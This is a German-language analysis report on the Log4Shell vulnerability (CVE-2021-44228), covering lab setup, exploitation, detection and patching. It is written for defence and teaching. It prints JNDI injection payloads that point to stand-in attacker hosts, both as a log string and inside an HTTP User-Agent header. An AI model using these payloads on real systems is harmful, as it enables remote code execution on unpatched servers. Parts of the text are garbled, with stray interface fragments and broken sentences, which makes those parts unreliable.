
CVE-2021-44228
Igloo Corporation Wonchihyeon Log4shell-Analysebericht
CVE-2021-44228 Log4j ist eine kostenlose Open-Source-Java-basierte Protokollierungsbibliothek der Apache Software Foundation, die in allen Java-basierten Anwendungen und verschiedenen Java-basierten Diensten zur Protokollierung verwendet wird. Sie nutzt die JNDI-Lookup-Funktion, um über LDAP (Port 1389) auf JDNI-Daten und -Objekte zuzugreifen und diese zu referenzieren.
Herunterladen des Docker-Images für den anfälligen Server Asudo git clone sudo docker build . -t vulnerable-app Erstellt das neue Image mit dem Namen vulnerable-app im aktuellen Verzeichnis durch den Docker-Build.
github.com/welk
Beenden des ungenutzten anfälligen Servers docker ps -a listet alle laufenden Docker-Images auf Prüfen der Container-ID
Log4Shell (CVE-2021-44228) ist eine Remote Code Execution (RCE)-Schwachstelle in der Apache Log4j-Bibliothek.
Angreifer können durch bösartige Payloads beliebigen Code ausführen, was weitreichende Schäden verursachen kann.
Dieser Bericht analysiert die Funktionsweise, Auswirkungen, Ausnutzungsbeispiele sowie Erkennungs- und Abwehrmaßnahmen von Log4Shell.
Log4Shell nutzt eine Schwachstelle in der JNDI (Java Naming and Directory Interface) Lookup-Funktion, um Angreifern die Ausführung von schädlichem Code von einem entfernten Server zu ermöglichen.
Der Angreifer kann die Schwachstelle ausnutzen, indem er die folgende Zeichenfolge in das Protokoll eintragen lässt:
${jndi:ldap://attacker.com:1389/exploit}
Die Log4Shell-Schwachstelle betrifft zahlreiche Unternehmen und Dienste, die Log4j verwenden.
Angreifer konnten den Server übernehmen, indem sie die folgende Zeichenfolge in den Minecraft-Chat eingegeben haben: shell 복사 편집 ${jndi:ldap://attacker.com:1389/exploit} Der Server protokolliert dies und führt über JNDI-Lookup den schädlichen Code vom Angreifer-Server aus.
Die Angreifer fügen bösartige Payloads in HTTP-Header-Felder ein, die protokolliert werden (z. B. User-Agent, Referer, X-Forwarded-For). Beispiel: css 복사 편집 GET / HTTP/1.1 Host: victim.com User-Agent: ${jndi:ldap://malicious.com:1389/exploit}
✅ Sicherheitsscanner verwenden
✅ Protokolldateien überprüfen
${jndi:ldap://...} in den Protokollen gefunden werden.✅ Netzwerküberwachung
✅ Sofortmaßnahmen
jndi:ldap:// in Firewalls und IDS/IPS.✅ Langfristige Sicherheitsmaßnahmen
| Log4j Version | Maßnahme |
|---|---|
| 2.0-beta9 ~ 2.14.1 | Anfällig, Update erforderlich |
| 2.15.0 | JNDI-Lookup standardmäßig deaktiviert |
| 2.16.0 | JNDI-Funktionalität vollständig entfernt |
| 2.17.0 | Zusätzliche Sicherheitsverbesserungen |
✅ Aktualisierung auf die neueste Version (2.17.1 oder höher) wird empfohlen!
Log4Shell (CVE-2021-44228) gilt als eine der schwerwiegendsten Sicherheitslücken der letzten Jahre. ✅ Anfällige Systeme müssen umgehend gepatcht werden, und eine kontinuierliche Sicherheitsüberwachung ist unerlässlich. ✅ Alle Anwendungen, die Log4j verwenden, sollten einer Sicherheitsprüfung unterzogen werden.
| Element | Beschreibung |
|---|
| Schwachstellenname | Log4Shell |
| CVE-Nummer | CVE-2021-44228 |
| Schwachstellentyp | Remote Code Execution (RCE) |
| Betroffene Versionen | Log4j 2.0-beta9 ~ 2.14.1 |
| Patch-Versionen | Log4j 2.15.0 und höher |
| Angriffskomplexität | Niedrig (einfache Zeichenfolge reicht aus) |
| Schweregrad | 🔥 Kritisch (CVSS 10.0) |